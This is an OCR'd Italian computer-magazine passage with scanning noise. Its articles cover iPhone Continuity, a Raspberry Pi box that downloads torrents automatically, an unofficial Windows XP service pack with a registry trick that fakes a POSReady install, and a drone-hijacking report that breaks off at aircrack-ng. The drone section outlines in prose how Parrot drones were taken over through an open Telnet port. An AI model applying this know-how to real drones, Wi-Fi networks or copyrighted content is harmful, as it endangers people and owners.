fare? Vediamo subito. 


••••• 3 ITA ▼ 18 07 • 0 h '.H* 

< iCIoud 

Lo stesso ID 

2B 11 trucco fun- 

•WM 31 1 1807 •' • .M 

{Impc: . iCIoud 


ziona solo se 



1_ f i due disposi- 

49 Safari 

Francesco 

tivi si trovano registra- 

ÌBl à 

ti ad iCIoud con lo 
stesso Apple ID: per 
verificare questa con- 

Note 


FI Wallet 

Configura "In famìglia”... 

dizione prendiamo gli 

Q Backup 


iPhone in nostro pos- 



sesso, andiamo in 

: Portachiavi 

Archivio 

Impostazioni/iCloud e 
assicuriamoci che il 
nome dell’utente e l'e- 

0 Trova il mio iPhone 

iCIoud Drive 

mail associata corri- 

AVANZATE 

♦ Foto 

spondano. 

Condividi la mia posiziono 


Cambiamo 

account 


0 Se così non 
fosse, su uno 
dei due di¬ 
spositivi scorriamo il 
pannello iCIoud fino in 
fondo, tappiamo su 
Esci e confermiamo. 
Fatto ciò accediamo 
nuovamente al pannel¬ 
lo iCIoud ed effettuia¬ 
mo il logincon lo stes¬ 
so Apple ID dell’altro 
telefono. 


La stessa Wi-Fi 


a Affinché la 
funzione Con- 
tinuityiunzìo- 
ni,i due telefoni devo¬ 
no essere collegati 
alla stessa rete locale 
wireless. Su entrambi 
i telefoni, quindi, an¬ 
diamo su Impostazio- 
ni/Wi-Fi e, se non 
sono già collegati, ef¬ 
fettuiamo l’accesso 
alla nostra rete Wi-Fi. 
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Ora possiamo scegliere da dove rispondere 


0 Adesso, se su uno dei due telefoni riceveremo una 
chiamata, squillerà anche l’altro, e potremo rispondere 
da quale preferiamo. La stessa cosa vale per gli SMS. 
Potremo, addirittura rispondere al telefono con l’iPad, dimensio¬ 
ni permettendo! 



TELEFONA 
DAL COMPUTER 

La funzione Continuity, 
come detto, consente 
di rispondere a tele¬ 
fonate ed SMS anche 
dal Mac, a patto che 
la nostra macchina sia 
supportata (lo sono 
praticamente tutti i 
Mac dal 2012 in poi: per 
conferma consultiamo il 
link www.winmagazine. 
it/link/3429) e di aver in¬ 
stallato il sistema ope¬ 
rativo Mac OS XI 0.10 
Yosemite o successivo. 
Una volta configurato 
iCIoud sull'iPhone e sul 
Mac da Preferenze di 
Sistema/iCloud, basta 
attivare il Bluetooth su 
entrambi i dispositivi 
e collegarli alla stessa 
rete Wi-Fi. D'ora in poi, 
alle telefonate ricevute 
suN'iPhone squillerà 
anche il computer e si 
potrà rispondere diret¬ 
tamente da quello! 
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Fai da te | Scarica tutto col Raspberry | 


L’aspiratutto 

automatico! 

Ecco come trasformare il Raspberry in un box che fa 
il pieno di film, serie TV e musica dal Web... in un clic 


Cosa oi 
occorre 


MINI COMPUTER 

RASPBERRY PI 2 

Quanto costa: € 42,75 
Sito Internet: 

www.raspberrypi.org 

DISTRIBUZIONE 
PER RASPBERRY 

RASPBERRY AUTO 
DOWNLOADER 

—) 

Sito Internet: 

www.winmagazine.it 


Q uando si parla di download dalla Rete 
bisogna tenere presente che non tutti 
quello si scarica è obbligatoriamente 
illegale. Esiste infatti tutta una serie di conte¬ 
nuti multimediali (film e serie TV di cui sono 
scaduti i diritti, brani musicali con licenza 
Creative Commons, software abandonwa- 
re, ecc) che possono essere scaricati senza 
violare la legge. Per chi è un appassionato 
downloader di questo tipo di contenuti però 
può essere scomodo stare dietro a ogni no¬ 
vità liberamente scaricabile e può diventare 
complicato dover cercare continuamente 
nuovo materiale. Inoltre, per prelevare da 
Internet serve un computer, che deve essere 
mantenuto acceso per molto tempo, attivi¬ 
tà che comporta un consumo notevole di 
energia elettrica. Senza contare che nella 
maggioranza dei casi i PC non possono essere 
controllati facilmente da remoto: se siamo 
su un treno e ci viene improvvisamente in 


mente di scaricare un contenuto, dobbiamo 
aspettare di arrivare a casa per sederci da¬ 
vanti al computer su cui è installato qualche 
client Torrent. Inoltre, per vedere i film sulla 
televisione è necessario spostare i file su 
qualche pendrive o magari connettere un 
PC direttamente alla TV. 

Tutto con un piccolo 
grande computer 

Per ovviare a tutti questi inconvenienti, ab¬ 
biamo pensato ad una soluzione che vede co¬ 
me protagonista il piccolo Raspberry. Questo 
computer, che costa appena 35 euro, può fun¬ 
zionare da media center: una volta collegato 
al televisore, potremo utilizzarlo per vedere 
film e ascoltare musica. Naturalmente, il bel¬ 
lo del Raspberry è che essendo un computer a 
tutti gli effetti è possibile installare su di esso 
un client torrent di modo che venga utilizzato 
non solo per guardare i film, ma anche per 


ATTENZIONE! 

Ricordiamo che scaricare da Internet con¬ 
tenuti video protetti da diritto d'autore è 
illegale in quanto viola l'articolo 174 ter del¬ 
la Legge sul diritto d'autore. 

Alcune procedure mostrate 
nell'articolo non vengono 
volutamente pubblica¬ 
te in maniera detta¬ 
gliata per evitare 
che siano messe 
in pratica. 


scaricarli. E, grazie a una serie di program¬ 
mi, è anche possibile controllare l’interno 
sistema da remoto, ovvero da un altro com¬ 
puter sfruttando una semplice interfaccia 
Web. Non solo: questi programmi possono 
semplificare e automatizzare la ricerca ed il 
download dei film e dei programmi televisivi. 
I tutorial e il sistema operativo che abbiamo 
preparato sono basati sul Raspberry Pi 2, che 
dispone di sufficiente potenza per riprodurre 
video in alta definizione. Il media center che 
abbiamo installato è il sempre ottimo Kodi, 
che può essere configurato fino nei minimi 
dettagli. Le varie interfacce Web sono in 
lingua inglese: purtroppo, questi programmi 
non sono mai stati tradotti in italiano. 
Per fortuna le parole da conoscere sono 
poche: download, search, e settings sono 
termini ormai noti a tutti. Il Raspberry 
può essere connesso al router casa¬ 
lingo tramite la sua porta Ethernet 
oppure con un qualsiasi adattatore 
Wi-Fi e può essere controllato con 
una tastiera wireless oppure con un 
telecomando a infrarossi. Non ci resta 
che assemblare il nostro aspiratutto 
universale. 
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TANTA MUSICA GRATIS DAL WEB 

Con l'applicazione Headphones possiamo tenere sotto controllo i 
nostri musicisti preferiti e scaricare automaticamente tutte le loro 
creazioni Creative Commons. Ecco come. 


Se amiamo la musica, tramite Headphones, 
applicazione contenuta nella nostra distribu¬ 
zione, possiamo cercare i nostri musicisti pre¬ 
feriti che creano brani Creative Commons e ag¬ 
giungerli alla lista di download. Headphones si 
occuperà automaticamente di trovare tutte le 
canzoni prodotte da quegli artisti e scaricarle. 
Naturalmente Headphones scaricherà anche 
eventuali future canzoni: ogni giorno il pro¬ 
gramma verifica se siano state rilasciati nuo¬ 
vi brani e provvede a scaricarli appena sono 


disponibili. L'interfaccia Web di Headphones 
si trova sulla porta 8787, quindi l'indirizzo da 
contattare tramite il nostro browser preferito è 
http://XX.XX .XX.XX:8 1 8 1 , dove XX.XX.XX.XX 
è l'indirizzo IP che il nostro router ha riservato 
al Raspberry. Per conoscere l'indirizzo IP del 
Raspberry è sufficiente aprire la sezione Set- 
tings di Kodi, nella scheda /VefworfcTramite 
questa scheda è anche possibile impostare 
un connessione Wi-Fi con password (mentre 
le connessioni ethernet sono automatiche). 



Gl Prepariamo il Raspberry 

Per mettere in funzione il nostro mini computer dobbiamo anzitutto procurarci la distribuzione 
e poi salvarla su un’apposita scheda MicroSD da inserire in esso. Ecco come procedere. 



^ Uno scrittore di immagini 

Scarichiamo Win32Disklmager da www.winmagazine.it/ 
link/3430, un tool che verrà usato per scrivere sulla Micro¬ 
SD l’immagine del sistema operativo (un file RAR), che scaricheremo 
dal seguente indirizzo www.winmagazine.it/link/3432. 
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^ Scompattiamo l'immagine 

Quando il download dell'Immagine è terminato possiamo 
estrarlo sul disco rigido del nostro computer. Serviranno 
diversi minuti perché l’immagine finale è grande quasi 8 GB, mentre 
la versione compressa arriva a poco più di 2,5 GB. 




ACCEDERE 
AL SISTEMA 
OPERATIVO 
TRAMITE SSH 


Il sistema operativo che 
fa funzionare il nostro 
Raspberry è Debian, 
quindi dispone del 
terminale bash (prati¬ 
camente, il prompt dei 
comandi di GNU/Linux). 
Nel caso in cui ci fossero 
dei problemi, possiamo 
accedere al sistema con 
il terminale remoto 
SSH: da Windows si può 
utilizzare il programma 
PuTTY (www.winma- 
gazine.it/link/3431). 

Il nome utente per 
l'accesso è "pi", mentre 
la password è "raspber¬ 
ry". I comandi possono 
essere eseguiti come 
amministratore sempli¬ 
cemente anteponendo 
al comando la parola 
sudo. Per ottenere un 
elenco dei file possiamo 
dare il comando Is, 
mentre per cambiare 
cartella il comando cd. 
Inoltre, il comando pwd 
ci dice in quale cartella 
ci troviamo al momento 
e df indica lo spazio resi¬ 
duo sui vari dischi. 


^ Tutto sulla MicroSD 

Una volta ottenuto il file raspberry-auto-downloader.img , 
inseriamo la scheda MicroSD nel computer (tramite apposi¬ 
to adattatore) e apriamo Win32Disklmager. Il programma ci chiederà 
il file appena scaricato e la lettera associata alla scheda MicroSD. 


^ Già pronto all’uso 

^ Inseriamo la scheda nel Raspberry2. Ad esso devono essere 
anche connessi uno schermo tramite la porta HDMI e una 
tastiera o un telecomando Infrarossi. Colleghiamo il Raspberry alla 
rete elettrica e al router (tramite porta LAN o adattatore Wi-Fi/USB). 


► 


Speciali Win Magazine 43 








































O Hacker in pratica 


Fai da te | Scarica tutto col Raspberry 



Tutti gli episodi sul nostro PC 


Servendoci di SickRage possiamo cercare facilmente in Rete e scaricare automaticamente le puntate delle vecchie 
serie TV per le quali sono scaduti i diritti d’autore. Vediamo subito come fare. 



.x C’è un nuovo show? 

Se l’indirizzo IP assegnato dal nostro router al Raspberry è XX.XX.XX.XX, 
l’Interfaccia Web di SickRage si trova all'Indirizzo http://XX.XX.XX.XX:8081 . 
(ricordiamo che XX.XX.XX.XX è IIP del Raspberry). Per aggiungere un contenuto, 
clicchiamo su Shows : nel menu che compare scegliamo l’opzione Add Shows. 




^ Alla ricerca delle serie TV 

A questo punto, se non stiamo cercando uno show preciso, ma vogliamo 
qualche suggerimento, conviene scegliamo l'opzione di IMDB, che propo¬ 
ne gli show di maggiore successo. Ma se vogliamo uno show specifico, scegliamo 
direttamente Add New Show. 



^ Ecco subito i risultati 

Per la ricerca della nostra serie televisiva preferita possiamo indicare il 
nome, ovviamente. Ma possiamo anche indicare la lingua e un eventuale 
sorgente Torrent preferenziale. Premendo il pulsante Search otterremo un elenco 
di possibili risultati. Selezioniamone uno e premiamo Next. 


a La cartella di salvataggio 

^ Indichiamo quindi la cartella in cui devono essere salvati i file. La cartella 
da selezionare, per semplificare l'utilizzo del mediacenter Kodi, è /home/pi/ 
Videos. All’interno di questa cartella SickRage creerà una sottocartella che conterrà 
i file dello show vogliamo scaricare. 



^ Scaricare o no? 

Arrivando al passo successivo, dobbiamo specificare indicare quale qualità 
del video vogliamo (per esempio HD 720p), quindi scegliere come gestire 
gli episodi delle serie TV. Selezionato Wanted per le varie opzioni, gli episodi ver¬ 
ranno scaricati. 


^ Il riepilogo con tutti gli spettacoli 

Una volta aggiunto lo show, possiamo trovarlo nella Show List. Ovviamente 
^ per il download degli episodi sarà necessario del tempo: possiamo vedere 
come procede la ricerca dei file scorrendo la pagina. Premendo Edit in alto a destra 
possiamo modificare le impostazioni dello show. 
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13 Film da scaricare in un clic 


Grazie all’interfaccia Web estremamente semplificata di CouchPotato possiamo ricercare e avviare il download, 
tramite Trasmission, di lungometraggi gratuiti in Rete selezionandone anche la qualità. 



-w A tu per tu con l'interfaccia 

L'interfaccia Web di CouchPotato si trova sulla porta 5050. Quindi l’indi¬ 
rizzo da visitare è http://XX.XX.XX.XX:5050/ (ricordiamo che XX.XX.XX.XX 
è IIP del Raspberry). L’interfaccia mostrai film più scaricati. Basta cliccare sulla 
locandina di un film per vedere i dettagli e decidere di scaricarlo. 



^ Scegliamo una versione 

Tramite la casella di ricerca possiamo cercare un film specifico scriven¬ 
do il suo nome o qualche altra indicazione (regia, anno di produzione...). 
Eseguita la ricerca, appaiono alcuni menu a discesa: il primo di essi ci permette 
di scegliere la versione del film. 



^ Questione di definizione 

Il secondo menu ci consente di scegliere la qualità del film: con Best sarà 
CouchPotato a selezionare la versione migliore disponibile. In alternativa, 
scegliamo noi stessi una versione (ad esempio 720p o 1080p). Per aggiungere 
il film all’elenco di quelli da scaricare, premiamo Add. 


± Torrent trovato o no? 

4 Nella scheda Movies possiamo vedere tutti i film selezionati. Se un film 
è stato trovato avrà una etichetta verde, altrimenti grigia. Se il film non è 
stato trovato, CouchPotato cercherà periodicamente di verificare se è finalmente 
disponibile per il download. 




^ Lo stato del download 

Possiamo verificare i dettagli di uno dei film selezionati cliccandoci sopra. 
È presente anche una indicazione dello stato attuale del download, la 
dimensione e il provider. Possiamo inoltre decidere di eliminare il film, se è neces¬ 
sario, ed eventualmente cambiare la qualità. 


^ Transmission sul Web 

Verifichiamo il download tramite 7rans/T7/ss/o/7(http://XX.XX.XX.XX:9091 
- ricordiamo che XX.XX.XX.XX è IIP del Raspberry). I download vengono 
bloccati se sulla scheda non c'è più spazio, ma possiamo impostarlo per scari¬ 
care in dischi esterni. 
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Microsoft non rilascia più 
Service Pack per il tuo OS? Solo 
noi ti diamo gli update unofficial 
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Cosa ci 
occorre ^ fficil i 

AGGIORNAMENTI 
DI SISTEMA 

WINDOWS XP 
SERVICE PACK 
UNOFFICIAL 

Lo trovi su: EtDVD 

Sito Internet: 

www.winmagazine.it 

SISTEMA OPERATIVO 

WINDOWS 
10 HOME 

Quanto costa: €135,oo 
Sito Internet: 

www.microsoft.it 


M icrosoft rilascia costantemente ag¬ 
giornamenti di sicurezza per Win¬ 
dows con cui vengono risolti bug e 
vulnerabilità del sistema operativo. Ci sono 
poi i Service pack, aggiornamenti più corposi 
che modificano più pesantemente il sistema. 
Questo, almeno, è ciò che accadeva fino a 
qualche anno fa. L’ultimo Service pack uffi¬ 
ciale, infatti, è l’SPl rilasciato da Microsoft 
nel 2011 per Windows 7. Da Windows 8 in poi 
Microsoft ha deciso di adottare una politica 
diversa, non rilasciando più aggiornamen¬ 
ti cumulativi, ma una vera e propria nuova 
versione del sistema operativo. Per Windows 
8, ad esempio, è stato rilasciato l'update 8.1. 
Con Windows 10, invece, vengono rilasciate 
costantemente le cosiddette build che non 
sono altro che nuove versioni dell’OS. 

Aggiornamenti in corso 

Se con le ultime release di Windows, quindi, 
si può stare relativamente tranquilli, non si 
può dire la stessa cosa per chi ha ancora un PC 
con Windows XP. Microsoft ha infatti deciso 
di interromperne il supporto non rilasciando 
più alcun tipo di aggiornamento. Per questo 
motivo abbiamo messo a punto un SP4 non 
ufficiale che installa le ultime patch e le li¬ 
brerie di sistema più importanti rendendo 
il sistema più sicuro. Certo, non trattandosi 
di una versione ufficiale, può capitare che si 
possano verificare errori e malfunzionamenti. 
Per questo chi esegue questo aggiornamento 
lo fa a suo rischio e pericolo. Per ridurre al 
minimo i rischi, prima di procedere è dunque 
consigliato fare un backup di tutti i nostri 
file in modo da poterli ripristinare in caso di 
errori. Nell’articolo troveremo, inoltre, tutti i 
trucchi e le dritte per mantenere tutti i sistemi 
operativi Microsoft (non solo XP, quindi) sem¬ 
pre in perfetta forma, anticipando il rilascio 
degli aggiornamenti ufficiali. 
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□Teniamo aggiornato Windows 7 

Il sistema operativo Microsoft più amato dagli utenti è stato anche l’ultimo ad aver visto il rilascio di un Service pack 
ufficiale. Ecco come procedere alla sua installazione per migliorare la nostra sicurezza su Internet. 



Installazione automatica- 

Il modo più semplice per installare il Servi¬ 
ce pack per Windows 7 è quello di ricorrere 
alla procedura automatica. Accediamo a Start/Tutti i 
programmi/Windows Update e nel riquadro a sini¬ 
stra cucchiamo Verifica disponibilità aggiornamenti. 
Selezioniamo Service Pack per Microsoft Windows 
(KB976932) e confermiamo con OK. 


... oppure manuale? 

2 In alternativa, colleghiamoci a www.winmaga- 
zine.it/link/341 9 e dal menu a tendina selezio¬ 
niamo la lingua per il Service pack (nel nostro caso Ita¬ 
liano). Cliccando Scarica verranno mostrati i file dispo¬ 
nibili: scarichiamo la ISO da masterizzare su DVD o 
l’eseguibile per la versione di Windows in nostro pos¬ 
sesso (32 o 64 bit). 


^ Avviamo l'aggiornamento 

Supponendo di avere la versione a 64 bit di 
Windows 7, selezioniamo il file windows6.1- 
KB976932-X64.exe, clicchiamo su Avanti e quindi 
salviamo il file in una qualsiasi cartella del PC, Fatto 
ciò, sarà sufficiente fare doppio clic sul file eseguibile 
e seguire la procedura guidata per portare a termine 
l'installazione. 


AGGIORNAMENTI 
PER WINDOWS 8 

Dopo Windows 7, Microsoft ha abbandonato l'uso dei Service 
pack, prediligendo un sistema per gli update più automatiz¬ 
zato. Dopo Windows 8, quindi, è stato rilasciato Windows 8.1 
che era possibile installare mediante il WindowsStore. Per 
Windows 8.1, invece, è stato rilasciato un importante Update 
(anche denominato KB2919355). Per installarlo automatica- 
mente basta andare in Impostazioni/Modificaimpostazioni 
PC, cliccare su Aggiorna e ripristina e quindi su Windows 
Update. Opzionalmente è possibile installarlo manualmen¬ 
te dai seguenti link: 

• Versione a 32 bit: www.winmagazine.it/link/3420 

• Versione a 64 bit: www.winmagazine.it/link/3421 


L'aggiornamento gratuito a 
Windows 10 è disponibile! 

Prenotazione Confermata 
Download Operazione completata 

-* Aggiorna - Disponibile 
Ecco cosa succederà: 

1. Aspettati circa 10 secondi di preparazione del 
dispositivo 

2. Leggi il Contratto di licenza 

3. Scegli quando eseguire l'aggiornamento 

OK, continuiamo 


4* impose 

OPZIONI AVANZATE 

Scegli come installare gli aggiornamenti 


Automalico «catta comtgkata) 


£ possibile garantire il funzionamento ottimale del sistema. Il dispositivo verrà ■ 
in usa Gli aggiornamenti non verranno scancatl se viene utilizzata una conness 
essere addebitati costi). 

H Sc«nc* aggiornamenti per altri prodotti Microsoft durante f aggiornamento 

VètunlizzA la cronologia degfc aggiornamenti 
Scegli come recapitare gti aggiornamenti 


Ricevi le build Insider Preview 


LE NUOVE BUILD 
DI WINDOWS 10 

A differenza delle vecchie versioni del sistema operativo 
Microsoft, gli aggiornamenti importanti per Windows 10 
prendono il nome di build. Per scegliere il modo in cui 
devono essere installate basta andare in Start//lmpo- 
stazioni/Aggiornamento e sicurezza/Windows Update 
e selezionare Opzioni avanzate. Dal menu Scegli come 
installare gli aggiornamenti scegliamo quindi come 
installare gli aggiornamenti. È possibile iscriversi al pro¬ 
gramma Insider che consente di installare e provare le 
nuove build prima del loro rilascio ufficiale. 



RIPRISTINIAMOLE 
VECCHIE FUNZIONI 


Con il passaggio ad una 
versione successiva di 
Windows, può capitare 
che alcune funzioni ven¬ 
gano eliminate. Possia¬ 
mo ripristinarle usando 
il tool Missed Features 
Installer (http://mfi- 
project.weebly.com). È 
di un file ISO che andrà 
masterizzato su DVD per 
avviarlo e scegliere le 
funzioni e le applicazio¬ 
ni da ripristinare. 


DISINSTALLARE 
L'SPl DI 
WINDOWS 7 

Nel caso in cui si ab¬ 
biano problemi con il 
Service Pack di Windows 
7, è possibile disinstal¬ 
larlo andando in Start/ 
Pannello di controllo/ 
Programmi/Program¬ 
mi e funzionalità, 
cliccando Visualizza ag¬ 
giornamenti installati, 
quindi Service Pack per 
Microsoft Windows (KB 
976932) e Disinstalla. 


► 
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m® E Windows XP e il suo SP4 


PROBLEMI 
INSTALLAZIONE 


Durante l'installazione 
dell'SP4 può compa¬ 
rire l'errore Failed to 
instali catalog fìles. Per 
risolvere il problema 
proviamo a cancellare 
la cartella CatRoot2 
dalla directory C;\ 
Windows\system32. 
Alcuni file potrebbero 
essere bloccati da pro¬ 
cessi in esecuzione. Per 
eliminarli usiamo il pro¬ 
gramma FileASSASSIN 
(www.winmagazine.it/ 
link/3427). Cancelliamo 
quindi i file tmp*.cat 
che si trovano nelle sot¬ 
tocartelle di CatRoot, 
anch'essa presente nelle 
directory C:\Windows\ 
system32. Poi tutti i 
file kb*.cat sempre 
nelle sottocartelle di 
CatRoot, i file oem*.*in 
C:\Windows\INF e tutti 
i file in C:\Windom\ 
SoftwareDistribution. 
Quindi installiamo di 
nuovo il Service Pack 4. 


C'È ANCHE 
WINDOWS VISTA 

Pur non essendo stato 
uno dei migliori sistemi 
operativi Microsoft, Vi¬ 
sta è comunque ancora 
su tantissimi PC. Per 
questo OS sono stati 
realizzati due Service 
pack. Per effettuarne 
l'installazione ci si può 
servire delle infor¬ 
mazioni reperibili su 
www.winmagazine.it/ 
link/3426. 


Q 

VI 


UAL E LA 
ERSIONEDI 
WINDOWS? 


Per conoscere la versio¬ 
ne del sistema operati¬ 
vo Microsoft installata 
sul nostro computer, e 
quindi anche il Service 
Pack, basta premere i 
tasti Win+R, digitare 
il comando winvere 
premere Invio. 


L’aggiornamento non ufficiale è compatibile solo con la versione Professional a 32bit in inglese 
del vecchio OS. Ma con alcuni accorgimenti possiamo installarlo anche su quella italiana. 




^ Procuriamoci gli strumenti 

Dalla sezione Sistema del Win DVD-Rom scarichiamo l’ar¬ 
chivio WindowsXP-USP4-v3. 1a-x86-ENU.zip che contiene 
al suo interno anche i pacchetti PATCHES-V3.1a.ZIPe SP4_BASIC- 
MUl.iso che ci serviranno per l’installazione del Service pack di Win¬ 
dows XP in italiano. 


Modifichiamo il registro 

Andiamo su Windows XP e clicchiamo su Start/Esegui. 
Digitiamo regedite premiamo Invio. Spostiamoci in HKEY_ 
L0CAL_MACHINE/SYSTEM/ControlSet001/Control/Nls/Language 
e modifichiamo il valore Default in 0409. Facciamo la stessa cosa 
InstallLanguage e riavviamo. 


Windows 

Help protect your PC 
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^ Installiamo l'aggiornamento 

A questo punto possiamo installare il Service Pack 4 facen¬ 
do doppio clic sul file WindowsXP-USP4-v3.1a-x86-ENU. 
exe scaricato precedentemente. Basterà seguire la procedura guida¬ 
ta e portarla a termine. Clicchiamo quindi su Finish per completare 
e riavviare il sistema. 


Scompattiamo la ISO 


^ Al riavvio ci ritroveremo il sistema in inglese e verranno avviati 
in background diversi processi che renderanno il PC un po' 
lento per circa 20-30 minuti. Usando 7zip (sezione Indispensabili del 
Win CD/DVD-Rom) estraiamo il file SP4_BASICMUI.ISO o masteriz¬ 
ziamolo su DVD. 



^ I pacchetti per la lingua 

Dalla cartella MUI facciamo doppio clic su MUISETUP.exe e 
installiamo i pacchetti per le lingue. Andiamo in MUI.SP3 ed 
eseguiamo il file autoestraente. Facciamo la stessa cosa con MUI.IE8 
e MUI.RDP. Infine in MUI.WMP facciamo doppio clic sul file wpm- 
1 1setup_muiita.exe. 


^ Torniamo all’italiano 

Andiamo in Start/Control Panel/Regional and Language e 
nel pannello Languages selezioniamo italiano. Clicchiamo 
Appiy e riawiamo il sistema. Ci troveremo finalmente con Windows 
XP aggiornato con l'SP4 e in italiano. Possiamo verificarlo da Pan¬ 
nello di controllo/System. 
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ESTENDERE GLI AGGIORNAMENTI DI WINDOWS XP FINO AL 2019 


Microsoft ha terminato il supporto a Windows 
XP per le versioni Home e Professional, ma in 
seguito ad alcuni accordi con le aziende e gli 
istituti di credito fornirà aggiornamenti di si¬ 
curezza per la versione Windows XP Embed- 
ded POSReady. Con un piccolo trucco, si può 
ingannare Microsoft e far credere che anche il 
nostro PC abbia installato la versione di Win¬ 
dows XP destinata alla gestione dei POS ban¬ 
cari, così da continuare a ricevere gli aggior¬ 
namenti fino al 2019. Il trucco consiste nella 
modifica del registro di sistema. Apriamo il 
Blocco Notee creiamo un nuovo file con all'in¬ 
terno il seguente testo, rispettando le righe: 


Windows Registry Editor Version 5.00 

[HKEY_LOCAL_MACHINE\SYSTEM\WPA\ 

PosReady] 

"instailed"=dword:0000000 7 

Salviamo il file col nome xp-pos.reg ed ese¬ 
guiamolo. Il trucco funziona solo con la ver¬ 
sione a 32bit di Windows XP SP3. È bene 
tenere presente che gli aggiornamenti che 
verranno rilasciati da Microsoft sono pen¬ 
sati per la versione Embedded POSReady e 
non per quella desktop: il sistema, quindi, 
potrebbe ugualmente rimanere esposto a 
rischi di sicurezza. 



CONTINUA A USARE IL VECCHIO SISTEMA OPERATIVO IN SICUREZZA 

Ecco i consigli e le dritte per utilizzare senza problemi Windows XP ed evitare di esporre il nostro computerà qualsiasi rischio anche 
adesso che il supporto ufficiale di Microsoft è stato definitivamente interrotto. 


(D NON USARE INTERNET 
V EXPLORER 

Su XP è presente la versione 8 del browser 
Microsoft. Considerato che l’ultima è la 11 
(addirittura in Windows 10 è stato sostitui¬ 
to da Microsoft Edge), si comprende come 
questa sia abbastanza obsoleta. Inoltre non 
essendo più supportata, ci espone a innu¬ 
merevoli rischi quando navighiamo sul Web. 
Meglio installare un browser che ancora for¬ 
nisce supporto al sistema operativo di Micro¬ 
soft come Google Chrome o Mozilla Firefox. 
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che utilizziamo quotidianamente. Assicuria¬ 
moci, quindi, di averli sempre aggiornati. Si 
può anche effettuare una verifica degli ag¬ 
giornamenti con un software come Update 
Notifier (www.winmagazine.it/link/3428). 

rr\ ATTIVIAMO 
V IL FIREWALL 

Può sembrare un consiglio scontato, ma sono 
in tanti a trascurare questo componente, pur 
essendo presente in Windows XP. Per esse¬ 
re sicuri che sia abilitato, andiamo in Start/ 
Pannello di controllo/Centro sicurezza PC: 



USA IE MA CON 
INTELLIGENZA 


Purtroppo ci sono siti compatibili solo col 
browser di Windows e quindi non si può 
non utilizzarlo. In questo caso è possibile ri¬ 
durre i rischi disabilitando ogni componen¬ 
te aggiuntivo dal menu Strumenti, come ad 
esempio Java, Flash e visualizzatori per PDF. 
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TENIAMO AGGIORNATI 
I SOFTWARE 


Sebbene Microsoft abbia interrotto il rilascio 
di aggiornamenti per il suo sistema operativo, 
questo non vale per tutti gli altri programmi 
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in corrispondenza di Firewall deve essere vi¬ 
sualizzata la voce Attivato. 


(?) UNA SUITE PIU SICURA 

▼ Non solo Windows XP, ma anche le 
vecchie versioni di Office non sono più sup¬ 
portate da Microsoft (come ad esempio Of¬ 
fice 2003). Se non vogliamo acquistare una 
nuova versione della suite dell'azienda di 
Redmond, possiamo ricorrere a un'alterna¬ 
tiva open source come LibreOffice (https:// 
it.libreoffice.org). 



0 USARE ACCOUNT CON 
V PRIVILEGI LIMITATI 


Per evitare che si possano installare inav¬ 
vertitamente malware, è più sicuro utilizza¬ 
re il computer con account con privilegi li¬ 
mitati. Per farlo basta andare in Start/Pan¬ 
nello di controllo/Account utente e configu¬ 
rarli opportunamente. Sarà comunque sem¬ 
pre possibile tornare a un account di ammi¬ 
nistratore nel caso fosse necessario instal¬ 
lare altri software. ■ 
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Così ti dirotto le 
“macchine volanti” 


Dopo Computer, cellulari router e automobili, i pirati 
informatici prendono di mira i Droni. Ecco le tecniche 
diaboliche messe in campo 

in collaborazione con Heli-Lab Droni Sicilia 



L o scenario che molti esperti prefiguravano 
da tempo, purtroppo si è avverato: duran¬ 
te l’ultima DEF CON tenutasi a Las Vegas 
lo scorso mese di agosto (www.defcon.org), 
alcuni ricercatori di sicurezza sono riusciti 
a sfruttare delle vulnerabilità presenti nel 
firmware dei droni Parrot (www.parrot.com) 
dimostrando la possibilità di utilizzi impropri 


ATTENZIONE! 

Ricordiamo che'forzare' le Reti Wi- 
Fi altrui è reato. Pertanto alcune 
procedure mostrate nell'articolo 
non vengono voluta- 
mente pubblicate 
in maniera detta¬ 
gliata per evita- M A n \ 
re che possano 


essere messe 
in pratica. 


PARROT BEBOP DRONE: IL MODELLO 
PRESO DI MIRA DAI PIRATI 

Durante la DEF CON di Las Vegas un gruppo di ricercatori di sicurezza ha preso 
di mira alcuni Bebop della Parrot per dare dimostrazione della semplicità con 
cui è possibile dirottare un drone. La loro scelta non è stata casuale. Il dispositivo è 
abbastanza economico, facile da pilotare e, per questo motivo, anche molto diffuso. 

Inoltre, viene radiocomandato mediante un'app per smartphone e tablet. Sul drone, infatti, 
è presente un modulo Wi-Fi che permette di creare una rete locale aperta usata per il controllo 

remoto e il trasferimento dei dati di volo, comprese le immagini 
riprese dalla videocamera integrata che vengono poi riprodotte 

• .__ _■ _l; I ! -I _ I 


reale sul display del telefonino o del 
tablet. Il Bebop e tutti i droni dotati 
di connettività Wi-Fi sono dunque 
un bersaglio ideale per tutti i pirati 
informatici... dell'aria! 


di queste "macchine volanti". Davanti ad un 
pubblico incredulo, i ricercatori sono riusciti 
a dirottare senza grosse difficoltà un Parrot 
Bebop Drone, facendolo addirittura precipi¬ 
tare a terra. La circostanza è sconcertante, se 
pensiamo che un aggressore potrebbe utiliz¬ 
zare il drone per colpire qualsiasi elemento 
sensibile preso come bersaglio. Nella seconda 
dimostrazione, invece, il professore univer¬ 
sitario Michael Robinson è riuscito a fare let¬ 
teralmente impazzire il drone deviandone la 
traiettoria in maniera casuale, con evidenti 
conseguenze. Entrambe le dimostrazioni, 
per fortuna pacifiche, hanno prefigurato i 
preoccupanti scenari futuri che la diffusione 
dei droni potrebbe spalancare. 

Accesso via Wi-Fi 

In entrambi i casi, i ricercatori di sicurezza sono 
riusciti a raggiungere il loro scopo sfruttando 
una falla del modulo Wi-Fi interno al drone: 
lo stesso modulo che permette di realizzare 
una rete locale per il controllo da remoto del 
velivolo usando uno smartphone o un tablet. 


Gli hacker sono quindi riusciti ad accedere a 
questa rete e a prendere il controllo deH'UAV 
(Unmanned Aerial Vehicle, velivolo senza pi¬ 
lota) attraverso una porta di comunicazione 
Telnet lasciata inspiegabilmente aperta dai 
progettisti del drone. È stato quindi un gioco 
da ragazzi acquisire i diritti di amministratore 
del dispositivo e terminare tutti i processi in 
esecuzione che gestivano il controllo del volo. 
L'aspetto preoccupante di tutta la faccenda 
è che chiunque, mediante un’applicazione 
gratuita installata su un dispositivo mobile, 
potrebbe essere in grado di agganciare e 
controllare, mentre sono in volo, i droni 
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QUELLO CHE SERVE PER METTERE KO LE "MACCHINE" VOLANTI 


RASPBERRY PI 2 MODEL B 
Il mini computer è sufficientemente potente 
e leggero (oltre che economico) per essere 
installato su un drone fornendo un'ottima 
interfaccia di collegamento e controllo. 




AIRCRACK-NG 

Una potente utility Wi-Fi che permette di buca¬ 
re le password WEP e WPA. Dopo aver rilevato 
le reti wireless, il tool avvia un attacco di tipo 
